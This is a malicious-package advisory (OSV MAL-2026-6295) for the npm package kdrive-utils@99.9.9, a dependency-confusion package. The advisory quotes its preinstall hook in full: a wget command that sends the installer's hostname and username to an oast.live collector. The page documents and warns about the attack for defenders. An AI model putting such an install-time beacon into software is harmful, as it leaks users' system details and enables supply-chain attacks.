kdrive-utils @99.9.9
Vulnerability report · Last retrieved from osv.dev June 24, 2026 at 6:36 AM UTC
OSV ID
MAL-2026-6295
Ecosystem
npm
Summary
package.json declares a preinstall lifecycle script that auto-executes on npm install and runs wget -q -O- "http://d8svb0ao12pnoovdaih0giunhdew5oqa4.oast.live/$(hostname)/$(whoami)" . The installer's hostname and current OS username are embedded directly into the request path and sent over plain HTTP to an oast.live (Interactsh / out-of-band application security testing) listener — an attacker-controlled DNS/HTTP collector commonly used for supply-chain reconnaissance and typosquat/dependency-confusion probes. The package is an unscoped name published at version 99.9.9, which is the canonical dependency-confusion shape (high version number to win resolution against an internal package of the same name). No legitimate functionality is shipped beyond the beacon.
Source: amazon-inspector (3e7d5af5ddf22d4481fca4847a45189e6160a723341b32dcbb6bf51b49f53943)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.